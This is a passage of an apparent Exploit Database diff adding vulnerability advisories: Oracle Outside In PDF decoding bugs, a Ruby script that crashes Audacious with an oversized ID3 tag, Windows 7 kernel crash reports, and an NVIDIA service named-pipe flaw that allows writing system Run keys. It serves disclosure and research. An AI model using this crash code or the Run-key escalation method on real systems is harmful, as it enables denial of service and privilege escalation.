http://protekresearchlab.com/exploits/COSIG-2015-001.pdf
|
||||
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/38787.zip
|
||||
|
||||
###############################################################################
|
63
platforms/windows/dos/38788.txt
Executable file
63
platforms/windows/dos/38788.txt
Executable file
|
@ -0,0 +1,63 @@
|
|||
#####################################################################################
|
||||
|
||||
Application: Oracle Outside In
|
||||
|
||||
Platforms: Windows
|
||||
|
||||
Versions: 8.5.2
|
||||
|
||||
CVE: CVE-2015-4877
|
||||
|
||||
Author: Francis Provencher of COSIG
|
||||
|
||||
Twitter: @COSIG_
|
||||
|
||||
#####################################################################################
|
||||
|
||||
1) Introduction
|
||||
2) Report Timeline
|
||||
3) Technical details
|
||||
4) POC
|
||||
|
||||
#####################################################################################
|
||||
|
||||
===============
|
||||
1) Introduction
|
||||
===============
|
||||
|
||||
Oracle Outside In Technology provides software developers with a comprehensive solution to access, transform, and control the contents of over 500 unstructured file formats. From the latest office suites, such as Microsoft Office 2007, to specialty formats and legacy files, Outside In Technology provides software developers with the tools to transform unstructured files into controllable information.
|
||||
|
||||
(http://www.oracle.com/us/technologies/embedded/025613.htm)
|
||||
|
||||
#####################################################################################
|
||||
|
||||
============================
|
||||
2) Report Timeline
|
||||
============================
|
||||
|
||||
2015-06-09: Francis Provencher of COSIG found the issue;
|
||||
2015-06-11: Francis Provencher of COSIG report vulnerability to Oracle SA;
|
||||
2015-10-18: Oracle release a patch for this issue;
|
||||
|
||||
#####################################################################################
|
||||
|
||||
============================
|
||||
3) Technical details
|
||||
============================
|
||||
|
||||
An heap memory corruption occured when Outside In decode (DCTDecode) a PDF with a JPEG that have an invalid “Heigth” value.
|
||||
|
||||
Successful exploitation of the vulnerabilities may allow execution of arbitrary code, but requires tricking a user into opening or previewing a malicious file.
|
||||
|
||||
#####################################################################################
|
||||
|
||||
===========
|
||||
|
||||
4) POC
|
||||
|
||||
===========
|
||||
|
||||
http://protekresearchlab.com/exploits/COSIG-2015-002.pdf
|
||||
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/38788.zip
|
||||
|
||||
###############################################################################
|
63
platforms/windows/dos/38789.txt
Executable file
63
platforms/windows/dos/38789.txt
Executable file
|
@ -0,0 +1,63 @@
|
|||
#####################################################################################
|
||||
|
||||
Application: Oracle Outside In
|
||||
|
||||
Platforms: Windows
|
||||
|
||||
Versions: 8.5.2
|
||||
|
||||
CVE: CVE-2015-4878
|
||||
|
||||
Author: Francis Provencher of COSIG
|
||||
|
||||
Twitter: @COSIG_
|
||||
|
||||
#####################################################################################
|
||||
|
||||
1) Introduction
|
||||
2) Report Timeline
|
||||
3) Technical details
|
||||
4) POC
|
||||
|
||||
#####################################################################################
|
||||
|
||||
===============
|
||||
1) Introduction
|
||||
===============
|
||||
|
||||
Oracle Outside In Technology provides software developers with a comprehensive solution to access, transform, and control the contents of over 500 unstructured file formats. From the latest office suites, such as Microsoft Office 2007, to specialty formats and legacy files, Outside In Technology provides software developers with the tools to transform unstructured files into controllable information.
|
||||
|
||||
(http://www.oracle.com/us/technologies/embedded/025613.htm)
|
||||
|
||||
#####################################################################################
|
||||
|
||||
============================
|
||||
2) Report Timeline
|
||||
============================
|
||||
|
||||
2015-06-09: Francis Provencher of COSIG found the issue;
|
||||
2015-06-11: Francis Provencher of COSIG report vulnerability to Oracle SA;
|
||||
2015-10-18: Oracle release a patch for this issue;
|
||||
|
||||
#####################################################################################
|
||||
|
||||
============================
|
||||
3) Technical details
|
||||
============================
|
||||
|
||||
A Use-After-Free memory corruption occured when Outside In decode (JBIG2Decode) a stream with an invalid image.
|
||||
|
||||
Successful exploitation of the vulnerabilities may allow execution of arbitrary code, but requires tricking a user into opening or previewing a malicious file.
|
||||
|
||||
#####################################################################################
|
||||
|
||||
===========
|
||||
|
||||
4) POC
|
||||
|
||||
===========
|
||||
|
||||
http://protekresearchlab.com/exploits/COSIG-2015-003.pdf
|
||||
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/38789.zip
|
||||
|
||||
###############################################################################
|
19
platforms/windows/dos/38791.rb
Executable file
19
platforms/windows/dos/38791.rb
Executable file
|
@ -0,0 +1,19 @@
|
|||
# Exploit Title: Audacious 3.7 ID3 Local Crash PoC
|
||||
# Date: 11-20-2015
|
||||
# Exploit Author: Antonio Z.
|
||||
# Vendor Homepage: http://audacious-media-player.org/
|
||||
# Software Link: http://audacious-media-player.org/download | http://distfiles.audacious-media-player.org/audacious-3.7-win32.zip
|
||||
# Version: 3.7
|
||||
# Tested on: Windows 7 SP1 x64, Windows 8.1 x64, Windows 10 x64, Debian 8.2 x86-x64
|
||||
# Comment: Issue was reported: http://redmine.audacious-media-player.org/issues/595
|
||||
|
||||
require 'fileutils'
|
||||
require 'mp3info'
|
||||
|
||||
evil = 'A' * 1048576
|
||||
|
||||
FileUtils.cp 'Test_Case.mp3', 'Test_Case_PoC.mp3'
|
||||
|
||||
Mp3Info.open('Test_Case_PoC.mp3') do |mp3|
|
||||
mp3.tag.artist = evil
|
||||
end
|
8
platforms/windows/dos/38793.txt
Executable file
8
platforms/windows/dos/38793.txt
Executable file
|
@ -0,0 +1,8 @@
|
|||
Source: https://code.google.com/p/google-security-research/issues/detail?id=516
|
||||
|
||||
The attached testcase crashes Windows 7 32-bit due to a pool buffer overflow in an ioctl handler. Enabling special on ndis.sys netio.sys and ntoskrnl helps to track down the issue, however it will crashes due to a bad pool header without special pool as well.
|
||||
---
|
||||
|
||||
Proof of Concept:
|
||||
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/38793.zip
|
||||
|
10
platforms/windows/dos/38794.txt
Executable file
10
platforms/windows/dos/38794.txt
Executable file
|
@ -0,0 +1,10 @@
|
|||
Source: https://code.google.com/p/google-security-research/issues/detail?id=510
|
||||
|
||||
The attached poc crashes 32-bit Windows 7 with a screen resolution of 1024x768 and 32bit color depth. The crash occurs during a memmove opperation while copying the cursor content from unmapped memory. This could potentially be used by an attacker to leak kernel memory.
|
||||
|
||||
When reproducing this issue in VMWare, it is necessary to remove VMWare tools. In QEMU the issue reproduces reliably.
|
||||
---
|
||||
|
||||
Proof of Concept:
|
||||
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/38794.zip
|
||||
|
8
platforms/windows/dos/38795.txt
Executable file
8
platforms/windows/dos/38795.txt
Executable file
|
@ -0,0 +1,8 @@
|
|||
Source: https://code.google.com/p/google-security-research/issues/detail?id=509
|
||||
|
||||
The attached testcase crashes Window 7 32-bit with Special Pool enabled on win32k.sys due to a use-after-free condition. The bug appears to be a race condition between two threads and multiple runs on the PoC might be required to trigger the bug. This is more reliable on systems with multiple cores.
|
||||
---
|
||||
|
||||
|
||||
Proof of Concept:
|
||||
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/38795.zip
|
8
platforms/windows/dos/38796.txt
Executable file
8
platforms/windows/dos/38796.txt
Executable file
|
@ -0,0 +1,8 @@
|
|||
Source: https://code.google.com/p/google-security-research/issues/detail?id=505
|
||||
|
||||
The attached testcase triggers a use-after-free condition in win32k. The attached debugger output was triggered on Windows 7 with Special Pool enabled on win32k.sys.
|
||||
---
|
||||
|
||||
Proof of Concept:
|
||||
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/38796.zip
|
||||
|
53
platforms/windows/local/38792.txt
Executable file
53
platforms/windows/local/38792.txt
Executable file
|
@ -0,0 +1,53 @@
|
|||
Source: https://code.google.com/p/google-security-research/issues/detail?id=515
|
||||
|
||||
NVIDIA: Stereoscopic 3D Driver Service Arbitrary Run Key Creation
|
||||
Platform: Windows, NVIDIA Service Version 7.17.13.5382
|
||||
Class: Elevation of Privilege, Remote Code Execution
|
||||
|
||||
Summary:
|
||||
The 3D Vision service nvSCPAPISvr.exe installed as part of typical driver installations runs at Local System and has an insecure named pipe server. One of the commands in the server can be used to set an Explorer Run key for the system which would allow a user to get code executing in the session of any other user who logs on to the same machine leading to elevation of privilege. In Windows Domain environments it would also be possible to exploit the vulnerability between machines if the attacker has access to a valid user account on one domain joined machine.
|
||||
|
||||
Description:
|
||||
|
||||
|
||||
The NVIDIA Stereoscopic 3D Driver Service exposes the named pipe “stereosvrpipe” which implements a simple command response service. One of the commands (number 2) will write an arbitrary value to a fixed set of two registry keys, one which is specific to NVIDIA (no effort has been made to determine if this could be abused) and also the HKEY_LOCAL_MACHINE explorer Run key. This Run key is inspected when a new copy of the Windows Explorer shell is started, any values are treated as command lines to execute. Therefore any user on the system can create an arbitrary run key entry and get their own commands to execute in the security context of any other user (such as an administrator) who logs into the system to interact with the desktop.
|
||||
|
||||
The named pipe is not locked down to prevent abuse, in fact it’s given a NULL DACL which means that any user can open the device, although it can’t be exploited from typical application sandboxes such as Chrome or IE. When the pipe is created no attempt is made to prevent remote access to the pipe (by passing the PIPE_REJECT_REMOTE_CLIENTS) flag. This means that the service can also be exposed to external systems, assuming the client has valid credentials (or is running within a session which can use Integrated Authentication). This is probably most dangerous in a Windows Domain Environment.
|
||||
|
||||
Finally the service has a potentially memory corruption issue when handling the registry key path. When reading a string from the named pipe the code doesn’t ensure the string is NUL terminated. Instead it’s passed to a function to verify that the path is prefixed with one of the valid registry keys. The code for this check is roughly:
|
||||
|
||||
BOOLEAN is_string_prefixed(char *read_str, char *prefix)
|
||||
{
|
||||
int ret = FALSE;
|
||||
int prefix_len = strlen(prefix);
|
||||
if ( read_str && strlen(read_str) >= prefix_len )
|
||||
{
|
||||
char old_char = read_str[prefix_len];
|
||||
read_str[prefix_len] = 0;
|
||||
if ( !_strnicmp(read_str, prefix, prefix_len) )
|
||||
ret = TRUE;
|
||||
read_str[prefix_len] = old_char;
|
||||
}
|
||||
return ret;
|
||||
}
|
||||
|
||||
If the passed string is not NUL terminated then this code will cause temporary memory corruption. For example if the passed string is exactly the same size as the prefix then the code will write the 0 one character off the end of the allocated buffer. Also if the read string’s size is less than the length of the prefix but the original allocation has non NUL data the zero could be written into another valid block. As the function restores the original value it’s unlikely to be reliably exploitable. However there’s actually no reason to do the overwrite as the code is already using strnicmp which will only check up to the prefix size.
|
||||
|
||||
In summary there are at least 4 issues with the service:
|
||||
1) Service exposes the ability to create an arbitrary system wide run key entry
|
||||
2) When creating the named pipe the PIPE_REJECT_REMOTE_CLIENTS is not passed meaning it can be connected to remotely to exploit the vulnerability.
|
||||
3) The pipe has a NULL DACL which allows any user to connect to it
|
||||
4) The processing of the registry key path has potential for memory corruption.
|
||||
|
||||
Proof of Concept:
|
||||
I’ve provided a proof of concept, in C# which will need to be compiled. You can use the csc compiler which comes with the .NET framework.
|
||||
|
||||
Expected Result:
|
||||
The pipe service can't be connected to or it doesn't write the registry key.
|
||||
|
||||
Observed Result:
|
||||
A new run key is present in HKLM\Software\Microsoft\Windows\CurrentVersion\Run which executes notepad (note on 64bit systems it will actually be under the Wow6432Node as the service is 32bit, but it will still execute).
|
||||
|
||||
Proof of Concept:
|
||||
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/38792.zip
|
||||
|
Loading…
Add table
Reference in a new issue